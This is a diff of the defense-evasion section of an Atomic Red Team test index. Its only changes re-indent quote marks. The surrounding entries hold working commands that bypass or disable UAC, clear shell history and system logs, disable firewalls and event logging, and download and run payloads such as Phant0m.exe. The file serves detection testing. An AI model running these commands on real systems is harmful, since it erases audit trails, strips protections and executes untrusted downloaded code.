@@ -22283,20 +22283,20 @@ defense-evasion:
dependencies:
- description: 'The binary must exist on disk at specified location (#{file_to_pad})
-'
+ '
prereq_command: 'if [ -f #{file_to_pad} ]; then exit 0; else exit 1; fi;
-'
+ '
get_prereq_command: 'cp /bin/ls #{file_to_pad}
-'
+ '
executor:
command: 'dd if=/dev/zero bs=1 count=1 >> #{file_to_pad}
-'
+ '
cleanup_command: 'rm #{file_to_pad}
-'
+ '
name: sh
T1542.003:
technique:
@@ -22534,7 +22534,7 @@ defense-evasion:
cmd.exe /c eventvwr.msc
cleanup_command: 'reg.exe delete hkcu\software\classes\mscfile /f >nul 2>&1
-'
+ '
name: command_prompt
- name: Bypass UAC using Event Viewer (PowerShell)
auto_generated_guid: a6ce9acf-842a-4af6-8f79-539be7608e2b
@@ -22556,7 +22556,7 @@ defense-evasion:
cleanup_command: 'Remove-Item "HKCU:\software\classes\mscfile" -force -Recurse
-ErrorAction Ignore
-'
+ '
name: powershell
- name: Bypass UAC using Fodhelper
auto_generated_guid: 58f641ea-12e3-499a-b684-44dee46bd182
@@ -22578,7 +22578,7 @@ defense-evasion:
cleanup_command: 'reg.exe delete hkcu\software\classes\ms-settings /f >nul
2>&1
-'
+ '
name: command_prompt
- name: Bypass UAC using Fodhelper - PowerShell
auto_generated_guid: 3f627297-6c38-4e7d-a278-fc2563eaaeaa
@@ -22601,7 +22601,7 @@ defense-evasion:
cleanup_command: 'Remove-Item "HKCU:\software\classes\ms-settings" -force
-Recurse -ErrorAction Ignore
-'
+ '
name: powershell
- name: Bypass UAC using ComputerDefaults (PowerShell)
auto_generated_guid: 3c51abf2-44bf-42d8-9111-dc96ff66750f
@@ -22624,7 +22624,7 @@ defense-evasion:
cleanup_command: 'Remove-Item "HKCU:\software\classes\ms-settings" -force
-Recurse -ErrorAction Ignore
-'
+ '
name: powershell
elevation_required: true
- name: Bypass UAC by Mocking Trusted Directories
@@ -22672,7 +22672,7 @@ defense-evasion:
cleanup_command: 'Remove-Item -Path "HKCU:\Software\Classes\Folder" -Recurse
-Force -ErrorAction Ignore
-'
+ '
name: powershell
- name: Disable UAC using reg.exe
auto_generated_guid: 9e8af564-53ec-407e-aaa8-3cb20c3af7f9
@@ -22685,11 +22685,11 @@ defense-evasion:
command: 'reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
/v EnableLUA /t REG_DWORD /d 0 /f
-'
+ '
cleanup_command: 'reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
/v EnableLUA /t REG_DWORD /d 1 /f
-'
+ '
name: command_prompt
elevation_required: true
- name: Bypass UAC using SilentCleanup task
@@ -22736,7 +22736,7 @@ defense-evasion:
dependencies:
- description: 'UACME executable must exist on disk at specified location (#{uacme_exe})
-'
+ '
prereq_command: |
$tempPath = cmd /c echo #{uacme_exe}
if (Test-Path "$tempPath") {exit 0} else {exit 1}
@@ -22747,7 +22747,7 @@ defense-evasion:
executor:
command: '"#{uacme_exe}"
-'
+ '
cleanup_command: |
powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
@@ -22772,7 +22772,7 @@ defense-evasion:
dependencies:
- description: 'UACME executable must exist on disk at specified location (#{uacme_exe})
-'
+ '
prereq_command: |
$tempPath = cmd /c echo #{uacme_exe}
if (Test-Path "$tempPath") {exit 0} else {exit 1}
@@ -22783,7 +22783,7 @@ defense-evasion:
executor:
command: '"#{uacme_exe}"
-'
+ '
cleanup_command: |
powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
@@ -22807,7 +22807,7 @@ defense-evasion:
dependencies:
- description: 'UACME executable must exist on disk at specified location (#{uacme_exe})
-'
+ '
prereq_command: |
$tempPath = cmd /c echo #{uacme_exe}
if (Test-Path "$tempPath") {exit 0} else {exit 1}
@@ -22818,7 +22818,7 @@ defense-evasion:
executor:
command: '"#{uacme_exe}"
-'
+ '
cleanup_command: |
powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
@@ -22843,7 +22843,7 @@ defense-evasion:
dependencies:
- description: 'UACME executable must exist on disk at specified location (#{uacme_exe})
-'
+ '
prereq_command: |
$tempPath = cmd /c echo #{uacme_exe}
if (Test-Path "$tempPath") {exit 0} else {exit 1}
@@ -22854,7 +22854,7 @@ defense-evasion:
executor:
command: '"#{uacme_exe}"
-'
+ '
cleanup_command: |
powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
@@ -22878,7 +22878,7 @@ defense-evasion:
dependencies:
- description: 'UACME executable must exist on disk at specified location (#{uacme_exe})
-'
+ '
prereq_command: |
$tempPath = cmd /c echo #{uacme_exe}
if (Test-Path "$tempPath") {exit 0} else {exit 1}
@@ -22889,7 +22889,7 @@ defense-evasion:
executor:
command: '"#{uacme_exe}"
-'
+ '
cleanup_command: |
powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
@@ -22913,7 +22913,7 @@ defense-evasion:
dependencies:
- description: 'UACME executable must exist on disk at specified location (#{uacme_exe})
-'
+ '
prereq_command: |
$tempPath = cmd /c echo #{uacme_exe}
if (Test-Path "$tempPath") {exit 0} else {exit 1}
@@ -22924,7 +22924,7 @@ defense-evasion:
executor:
command: '"#{uacme_exe}"
-'
+ '
cleanup_command: |
powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
@@ -22949,7 +22949,7 @@ defense-evasion:
dependencies:
- description: 'UACME executable must exist on disk at specified location (#{uacme_exe})
-'
+ '
prereq_command: |
$tempPath = cmd /c echo #{uacme_exe}
if (Test-Path "$tempPath") {exit 0} else {exit 1}
@@ -22960,7 +22960,7 @@ defense-evasion:
executor:
command: '"#{uacme_exe}"
-'
+ '
cleanup_command: |
powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
@@ -22985,7 +22985,7 @@ defense-evasion:
dependencies:
- description: 'UACME executable must exist on disk at specified location (#{uacme_exe})
-'
+ '
prereq_command: |
$tempPath = cmd /c echo #{uacme_exe}
if (Test-Path "$tempPath") {exit 0} else {exit 1}
@@ -22996,7 +22996,7 @@ defense-evasion:
executor:
command: '"#{uacme_exe}"
-'
+ '
cleanup_command: |
powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
@@ -23078,7 +23078,7 @@ defense-evasion:
description: 'Adversaries may supply CMSTP.exe with INF files infected with
malicious commands
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -23090,24 +23090,24 @@ defense-evasion:
dependencies:
- description: 'INF file must exist on disk at specified location (#{inf_file_path})
-'
+ '
prereq_command: 'if (Test-Path #{inf_file_path}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{inf_file_path}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.003/src/T218.003.inf" -OutFile "#{inf_file_path}"
executor:
command: 'cmstp.exe /s #{inf_file_path}
-'
+ '
name: command_prompt
- name: CMSTP Executing UAC Bypass
auto_generated_guid: 748cb4f6-2fb3-4e97-b7ad-b22635a09ab0
description: 'Adversaries may invoke cmd.exe (or other malicious commands) by
embedding them in the RunPreSetupCommandsSection of an INF file
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -23119,17 +23119,17 @@ defense-evasion:
dependencies:
- description: 'INF file must exist on disk at specified location (#{inf_file_uac})
-'
+ '
prereq_command: 'if (Test-Path #{inf_file_uac}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{inf_file_uac}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.003/src/T1218.003_uacbypass.inf" -OutFile "#{inf_file_uac}"
executor:
command: 'cmstp.exe /s #{inf_file_uac} /au
-'
+ '
name: command_prompt
T1574.012:
technique:
@@ -23240,7 +23240,7 @@ defense-evasion:
- description: "#{file_name} must be present\n"
prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}"
@@ -23285,7 +23285,7 @@ defense-evasion:
- description: "#{file_name} must be present\n"
prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}"
@@ -23323,7 +23323,7 @@ defense-evasion:
- description: "#{file_name} must be present\n"
prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}"
@@ -23407,71 +23407,71 @@ defense-evasion:
auto_generated_guid: a934276e-2be5-4a36-93fd-98adbb5bd4fc
description: 'Clears bash history via rm
-'
+ '
supported_platforms:
- linux
- macos
executor:
command: 'rm ~/.bash_history
-'
+ '
name: sh
- name: Clear Bash history (echo)
auto_generated_guid: cbf506a5-dd78-43e5-be7e-a46b7c7a0a11
description: 'Clears bash history via rm
-'
+ '
supported_platforms:
- linux
executor:
command: 'echo "" > ~/.bash_history
-'
+ '
name: sh
- name: Clear Bash history (cat dev/null)
auto_generated_guid: b1251c35-dcd3-4ea1-86da-36d27b54f31f
description: 'Clears bash history via cat /dev/null
-'
+ '
supported_platforms:
- linux
- macos
executor:
command: 'cat /dev/null > ~/.bash_history
-'
+ '
name: sh
- name: Clear Bash history (ln dev/null)
auto_generated_guid: 23d348f3-cc5c-4ba9-bd0a-ae09069f0914
description: 'Clears bash history via a symlink to /dev/null
-'
+ '
supported_platforms:
- linux
- macos
executor:
command: 'ln -sf /dev/null ~/.bash_history
-'
+ '
name: sh
- name: Clear Bash history (truncate)
auto_generated_guid: 47966a1d-df4f-4078-af65-db6d9aa20739
description: 'Clears bash history via truncate
-'
+ '
supported_platforms:
- linux
executor:
command: 'truncate -s0 ~/.bash_history
-'
+ '
name: sh
- name: Clear history of a bunch of shells
auto_generated_guid: 7e6721df-5f08-4370-9255-f06d8a77af4c
description: 'Clears the history of a bunch of different shell types by setting
the history size to zero
-'
+ '
supported_platforms:
- linux
- macos
@@ -23486,7 +23486,7 @@ defense-evasion:
description: 'Clears the history and disable bash history logging of the current
shell and future shell sessions
-'
+ '
supported_platforms:
- linux
- macos
@@ -23506,7 +23506,7 @@ defense-evasion:
description: 'Using a space before a command causes the command to not be logged
in the Bash History file
-'
+ '
supported_platforms:
- linux
- macos
@@ -23521,13 +23521,13 @@ defense-evasion:
keeps the ssh client from catching a proper TTY, which is what usually gets
logged on lastlog
-'
+ '
supported_platforms:
- linux
dependencies:
- description: 'Install sshpass and create user account used for excuting
-'
+ '
prereq_command: "$(getent passwd testuser1 >/dev/null) && $(which sshpass
>/dev/null)\n"
get_prereq_command: |
@@ -23537,35 +23537,35 @@ defense-evasion:
executor:
command: 'sshpass -p ''pwd101!'' ssh testuser1@localhost -T hostname
-'
+ '
cleanup_command: 'userdel -f testuser1
-'
+ '
name: sh
- name: Prevent Powershell History Logging
auto_generated_guid: 2f898b81-3e97-4abb-bc3f-a95138988370
description: 'Prevents Powershell history
-'
+ '
supported_platforms:
- windows
executor:
command: 'Set-PSReadlineOption –HistorySaveStyle SaveNothing
-'
+ '
name: powershell
cleanup_command: Set-PSReadLineOption -HistorySaveStyle SaveIncrementally
- name: Clear Powershell History by Deleting History File
auto_generated_guid: da75ae8d-26d6-4483-b0fe-700e4df4f037
description: 'Clears Powershell history
-'
+ '
supported_platforms:
- windows
executor:
command: 'Remove-Item (Get-PSReadlineOption).HistorySavePath
-'
+ '
name: powershell
T1070.002:
technique:
@@ -23616,7 +23616,7 @@ defense-evasion:
auto_generated_guid: 989cc1b1-3642-4260-a809-54f9dd559683
description: 'Delete system and audit logs
-'
+ '
supported_platforms:
- macos
- linux
@@ -23632,7 +23632,7 @@ defense-evasion:
This technique was used by threat actor Rocke during the exploitation of Linux
web servers.
-'
+ '
supported_platforms:
- linux
input_arguments:
@@ -23643,14 +23643,14 @@ defense-evasion:
executor:
command: 'echo 0> /var/spool/mail/#{username}
-'
+ '
name: bash
- name: Overwrite Linux Log
auto_generated_guid: d304b2dc-90b4-4465-a650-16ddd503f7b5
description: 'This test overwrites the specified log. This technique was used
by threat actor Rocke during the exploitation of Linux web servers.
-'
+ '
supported_platforms:
- linux
input_arguments:
@@ -23661,7 +23661,7 @@ defense-evasion:
executor:
command: 'echo 0> #{log_path}
-'
+ '
name: bash
T1070.001:
technique:
@@ -23729,7 +23729,7 @@ defense-evasion:
System.evtx logs at C:\Windows\System32\winevt\Logs and verify that it is
now empty.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -23740,7 +23740,7 @@ defense-evasion:
executor:
command: 'wevtutil cl #{log_name}
-'
+ '
name: command_prompt
elevation_required: true
- name: Delete System Logs Using Clear-EventLog
@@ -23769,7 +23769,7 @@ defense-evasion:
dependencies:
- description: 'Microsoft Word must be installed
-'
+ '
prereq_command: |
try {
New-Object -COMObject "Word.Application" | Out-Null
@@ -23779,7 +23779,7 @@ defense-evasion:
get_prereq_command: 'Write-Host "You will need to install Microsoft Word manually
to meet this requirement"
-'
+ '
executor:
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
@@ -23853,7 +23853,7 @@ defense-evasion:
description: 'GCP Service Accounts can be used to gain intial access as well
as maintain persistence inside Google Cloud.
-'
+ '
supported_platforms:
- google-workspace
- windows
@@ -23888,20 +23888,20 @@ defense-evasion:
cleanup_command: 'gcloud iam service-accounts delete #{service-account-email}
--quiet
-'
+ '
dependency_executor_name: gcloud
dependencies:
- description: 'Requires gcloud
-'
+ '
prereq_command: 'if [ -x "$(command -v gcloud)" ]; then exit 0; else exit
1; fi;
-'
+ '
get_prereq_command: 'echo "Please Install Google Cloud SDK before running
this atomic test : https://cloud.google.com/sdk/docs/install"
-'
+ '
T1553.002:
technique:
object_marking_refs:
@@ -24148,10 +24148,10 @@ defense-evasion:
dependencies:
- description: 'C# file must exist on disk at specified location (#{input_file})
-'
+ '
prereq_command: 'if (Test-Path #{input_file}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{input_file}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.004/src/calc.cs" -OutFile "#{input_file}"
@@ -24159,10 +24159,10 @@ defense-evasion:
command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:#{output_file}
#{input_file}
-'
+ '
cleanup_command: 'del #{output_file} >nul 2>&1
-'
+ '
name: command_prompt
- name: Dynamic C# Compile
auto_generated_guid: 453614d8-3ba6-4147-acc0-7ec4b3e1faef
@@ -24184,24 +24184,24 @@ defense-evasion:
dependencies:
- description: 'exe file must exist on disk at specified location (#{input_file})
-'
+ '
prereq_command: 'if (Test-Path #{input_file}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Invoke-WebRequest https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.004/bin/T1027.004_DynamicCompile.exe
-OutFile #{input_file}
-'
+ '
executor:
command: 'Invoke-Expression #{input_file}
-'
+ '
name: powershell
- name: C compile
auto_generated_guid: d0377aa6-850a-42b2-95f0-de558d80be57
description: 'Compile a c file with either gcc or clang on Linux or Macos.
-'
+ '
supported_platforms:
- linux
- macos
@@ -24214,14 +24214,14 @@ defense-evasion:
dependencies:
- description: 'the source file must exist on disk at specified location (#{input_file})
-'
+ '
prereq_command: 'if [ -e #{input_file} ]; then exit 0; else exit 1; fi
-'
+ '
get_prereq_command: 'wget https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.004/src/T1027-004-test.c
-O #{input_file}
-'
+ '
executor:
command: |
gcc #{input_file} && ./a.out
@@ -24231,7 +24231,7 @@ defense-evasion:
auto_generated_guid: da97bb11-d6d0-4fc1-b445-e443d1346efe
description: 'Compile a c file with either gcc or clang on Linux or Macos.
-'
+ '
supported_platforms:
- linux
- macos
@@ -24244,14 +24244,14 @@ defense-evasion:
dependencies:
- description: 'the source file must exist on disk at specified location (#{input_file})
-'
+ '
prereq_command: 'if [ -e #{input_file} ]; then exit 0; else exit 1; fi
-'
+ '
get_prereq_command: 'wget https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.004/src/T1027-004-test.cc
-O #{input_file}
-'
+ '
executor:
command: |
g++ #{input_file} && ./a.out
@@ -24261,7 +24261,7 @@ defense-evasion:
auto_generated_guid: 78bd3fa7-773c-449e-a978-dc1f1500bc52
description: 'Compile a c file with either gcc or clang on Linux or Macos.
-'
+ '
supported_platforms:
- linux
- macos
@@ -24274,18 +24274,18 @@ defense-evasion:
dependencies:
- description: 'the source file must exist on disk at specified location (#{input_file})
-'
+ '
prereq_command: 'if [ -e #{input_file} ]; then exit 0; else exit 1; fi
-'
+ '
get_prereq_command: 'wget https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.004/src/T1027-004-test.go
-O #{input_file}
-'
+ '
executor:
command: 'go run #{input_file}
-'
+ '
name: bash
T1218.001:
technique:
@@ -24365,17 +24365,17 @@ defense-evasion:
dependencies:
- description: 'The payload must exist on disk at specified location (#{local_chm_file})
-'
+ '
prereq_command: 'if (Test-Path #{local_chm_file}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{local_chm_file}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.001/src/T1218.001.chm" -OutFile "#{local_chm_file}"
executor:
command: 'hh.exe #{local_chm_file}
-'
+ '
name: command_prompt
- name: Compiled HTML Help Remote Payload
auto_generated_guid: 0f8af516-9818-4172-922b-42986ef1e81d
@@ -24392,7 +24392,7 @@ defense-evasion:
executor:
command: 'hh.exe #{remote_chm_file}
-'
+ '
name: command_prompt
- name: Invoke CHM with default Shortcut Command Execution
auto_generated_guid: 29d6f0d7-be63-4482-8827-ea77126c1ef7
@@ -24418,7 +24418,7 @@ defense-evasion:
get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
-Force
-'
+ '
executor:
command: 'Invoke-ATHCompiledHelp -HHFilePath #{hh_file_path} -CHMFilePath
#{chm_file_path}'
@@ -24451,7 +24451,7 @@ defense-evasion:
get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
-Force
-'
+ '
executor:
command: 'Invoke-ATHCompiledHelp -InfoTechStorageHandler #{infotech_storage_handler}
-HHFilePath #{hh_file_path} -CHMFilePath #{chm_file_path}'
@@ -24476,7 +24476,7 @@ defense-evasion:
get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
-Force
-'
+ '
executor:
command: 'Invoke-ATHCompiledHelp -SimulateUserDoubleClick -CHMFilePath #{chm_file_path}'
name: powershell
@@ -24517,7 +24517,7 @@ defense-evasion:
get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
-Force
-'
+ '
executor:
command: 'Invoke-ATHCompiledHelp -ScriptEngine #{script_engine} -InfoTechStorageHandler
#{infotech_storage_handler} -TopicExtension #{topic_extension} -HHFilePath
@@ -24556,7 +24556,7 @@ defense-evasion:
get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
-Force
-'
+ '
executor:
command: 'Invoke-ATHCompiledHelp -ExecuteShortcutCommand -InfoTechStorageHandler
#{infotech_storage_handler} -TopicExtension #{topic_extension} -HHFilePath
@@ -24709,17 +24709,17 @@ defense-evasion:
dependencies:
- description: 'Cpl file must exist on disk at specified location (#{cpl_file_path})
-'
+ '
prereq_command: 'if (Test-Path #{cpl_file_path}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{cpl_file_path}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.002/bin/calc.cpl" -OutFile "#{cpl_file_path}"
executor:
command: 'control.exe #{cpl_file_path}
-'
+ '
name: command_prompt
T1578.002:
technique:
@@ -25073,10 +25073,10 @@ defense-evasion:
dependencies:
- description: 'Gup.exe binary must exist on disk at specified location (#{gup_executable})
-'
+ '
prereq_command: 'if (Test-Path #{gup_executable}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{gup_executable}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/GUP.exe?raw=true" -OutFile "#{gup_executable}"
@@ -25084,7 +25084,7 @@ defense-evasion:
command: "#{gup_executable}\n"
cleanup_command: 'taskkill /F /IM #{process_name} >nul 2>&1
-'
+ '
name: command_prompt
T1078.001:
technique:
@@ -25204,7 +25204,7 @@ defense-evasion:
description: 'The Adversaries can activate the default Guest user. The guest
account is inactivated by default
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -25215,10 +25215,10 @@ defense-evasion:
executor:
command: 'net user #{guest_user} /active:yes
-'
+ '
cleanup_command: 'net user #{guest_user} /active:no
-'
+ '
name: command_prompt
elevation_required: true
T1578.003:
@@ -25357,7 +25357,7 @@ defense-evasion:
description: 'Rename certutil and decode a file. This is in reference to latest
research by FireEye [here](https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html)
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -25380,7 +25380,7 @@ defense-evasion:
description: 'Use Python to decode a base64-encoded text string and echo it
to the console
-'
+ '
supported_platforms:
- linux
- macos
@@ -25396,13 +25396,13 @@ defense-evasion:
dependencies:
- description: 'Python must be present
-'
+ '
prereq_command: 'which python3
-'
+ '
get_prereq_command: 'echo "Please install Python 3"
-'
+ '
executor:
name: sh
elevation_required: false
@@ -25419,7 +25419,7 @@ defense-evasion:
description: 'Use Perl to decode a base64-encoded text string and echo it to
the console
-'
+ '
supported_platforms:
- linux
- macos
@@ -25435,13 +25435,13 @@ defense-evasion:
dependencies:
- description: 'Perl must be present
-'
+ '
prereq_command: 'which perl
-'
+ '
get_prereq_command: 'echo "Please install Perl"
-'
+ '
executor:
name: sh
elevation_required: false
@@ -25455,7 +25455,7 @@ defense-evasion:
description: 'Use common shell utilities to decode a base64-encoded text string
and echo it to the console
-'
+ '
supported_platforms:
- linux
- macos
@@ -25486,7 +25486,7 @@ defense-evasion:
description: 'Use common shell utilities to decode a hex-encoded text string
and echo it to the console
-'
+ '
supported_platforms:
- linux
- macos
@@ -25502,13 +25502,13 @@ defense-evasion:
dependencies:
- description: 'xxd must be present
-'
+ '
prereq_command: 'which xxd
-'
+ '
get_prereq_command: 'echo "Please install xxd"
-'
+ '
executor:
name: sh
elevation_required: false
@@ -25741,7 +25741,7 @@ defense-evasion:
description: 'Creates a new cloudTrail in AWS, Upon successful creation it will
Update,Stop and Delete the cloudTrail
-'
+ '
supported_platforms:
- iaas:aws
input_arguments:
@@ -25760,7 +25760,7 @@ defense-evasion:
dependencies:
- description: 'Check if ~/.aws/credentials file has a default stanza is configured
-'
+ '
prereq_command: |
cat ~/.aws/credentials | grep "default"
aws s3api create-bucket --bucket #{s3_bucket_name} --region #{region}
@@ -25768,7 +25768,7 @@ defense-evasion:
get_prereq_command: 'echo Please install the aws-cli and configure your AWS
defult profile using: aws configure
-'
+ '
executor:
command: |
aws cloudtrail create-trail --name #{cloudtrail_name} --s3-bucket-name #{s3_bucket_name} --region #{region}
@@ -25812,14 +25812,14 @@ defense-evasion:
dependencies:
- description: 'Install-Module -Name Az
-'
+ '
prereq_command: 'try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue)
{exit 0} else {exit 1}} catch {exit 1}
-'
+ '
get_prereq_command: 'Install-Module -Name AzureAD -Force
-'
+ '
executor:
command: |
$secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
@@ -25850,7 +25850,7 @@ defense-evasion:
dependencies:
- description: 'ExchangeOnlineManagement PowerShell module must be installed
-'
+ '
prereq_command: |
$RequiredModule = Get-Module -Name ExchangeOnlineManagement -ListAvailable
if (-not $RequiredModule) {exit 1}
@@ -26023,7 +26023,7 @@ defense-evasion:
command: 'C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}"
/section:httplogging /dontLog:true
-'
+ '
cleanup_command: |
if(Test-Path "C:\Windows\System32\inetsrv\appcmd.exe"){
C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:false *>$null
@@ -26098,16 +26098,16 @@ defense-evasion:
executor:
command: 'wevtutil sl "#{log_name}" /e:false
-'
+ '
cleanup_command: 'wevtutil sl "#{log_name}" /e:true
-'
+ '
name: command_prompt
- name: Makes Eventlog blind with Phant0m
auto_generated_guid: 3ddf3d03-f5d6-462a-ad76-2c5ff7b6d741
description: 'Use [Phant0m](https://github.com/hlldz/Phant0m) to disable Eventlog
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -26119,20 +26119,20 @@ defense-evasion:
dependencies:
- description: 'Phant0m.exe must exist on disk at specified location (#{file_name})
-'
+ '
prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1562.002/bin/Phant0m.exe" -OutFile "#{file_name}" -UseBasicParsing
executor:
command: 'PathToAtomicsFolder\T1562.002\bin\Phant0m.exe
-'
+ '
cleanup_command: 'echo "Sorry you have to reboot"
-'
+ '
name: command_prompt
T1562.007:
technique:
@@ -26232,10 +26232,10 @@ defense-evasion:
executor:
command: 'netsh advfirewall set currentprofile state off
-'
+ '
cleanup_command: 'netsh advfirewall set currentprofile state on >nul 2>&1
-'
+ '
name: command_prompt
- name: Disable Microsoft Defender Firewall via Registry
auto_generated_guid: afedc8c4-038c-4d82-b3e5-623a95f8a612
@@ -26248,11 +26248,11 @@ defense-evasion:
command: 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile"
/v "EnableFirewall" /t REG_DWORD /d 0 /f
-'
+ '
cleanup_command: 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile"
/v "EnableFirewall" /t REG_DWORD /d 1 /f
-'
+ '
name: command_prompt
- name: Allow SMB and RDP on Microsoft Defender Firewall
auto_generated_guid: d9841bf8-f161-4c73-81e9-fd773a5ff8c1
@@ -26267,7 +26267,7 @@ defense-evasion:
netsh advfirewall firewall set rule group="file and printer sharing" new enable=Yes
cleanup_command: 'netsh advfirewall reset >nul 2>&1
-'
+ '
name: command_prompt
- name: Opening ports for proxy - HARDRAIN
auto_generated_guid: 15e57006-79dd-46df-9bf9-31bc24fb5a80
@@ -26326,27 +26326,27 @@ defense-evasion:
auto_generated_guid: fe135572-edcd-49a2-afe6-1d39521c5a9a
description: 'Stop the Uncomplicated Firewall (UFW) if installed.
-'
+ '
supported_platforms:
- linux
dependency_executor_name: sh
dependencies:
- description: 'Check if ufw is installed on the machine.
-'
+ '
prereq_command: "if [ ! -x \"$(command -v ufw)\" ]; then echo -e \"\\n*****
ufw NOT installed *****\\n\"; exit 1; fi\nif echo \"$(ufw status)\" |grep
-q \"inactive\"; then echo -e \"\\n***** ufw inactive *****\\n\"; exit 1;
fi \n"
get_prereq_command: 'echo ""
-'
+ '
executor:
name: sh
elevation_required: true
command: 'ufw disable
-'
+ '
cleanup_command: |
ufw enable
ufw status verbose
@@ -26360,7 +26360,7 @@ defense-evasion:
dependencies:
- description: 'Check if systemctl and ufw is installed on the machine.
-'
+ '
prereq_command: "if [ ! -x \"$(command -v systemctl)\" ]; then echo -e \"\\n*****
systemctl NOT installed *****\\n\"; exit 1; fi\nif [ ! -x \"$(command -v
ufw)\" ]; then echo -e \"\\n***** ufw NOT installed *****\\n\"; exit 1;
@@ -26368,13 +26368,13 @@ defense-evasion:
ufw inactive *****\\n\"; exit 1; fi \n"
get_prereq_command: 'echo ""
-'
+ '
executor:
name: sh
elevation_required: true
command: 'systemctl stop ufw
-'
+ '
cleanup_command: |
systemctl start ufw
systemctl status ufw
@@ -26387,20 +26387,20 @@ defense-evasion:
dependencies:
- description: 'Check if ufw is installed on the machine and enabled.
-'
+ '
prereq_command: "if [ ! -x \"$(command -v ufw)\" ]; then echo -e \"\\n*****
ufw NOT installed *****\\n\"; exit 1; fi\nif echo \"$(ufw status)\" |grep
-q \"inactive\"; then echo -e \"\\n***** ufw inactive *****\\n\"; exit 1;
fi \n"
get_prereq_command: 'echo ""
-'
+ '
executor:
name: sh
elevation_required: true
command: 'ufw logging off
-'
+ '
cleanup_command: |
ufw logging low
ufw status verbose
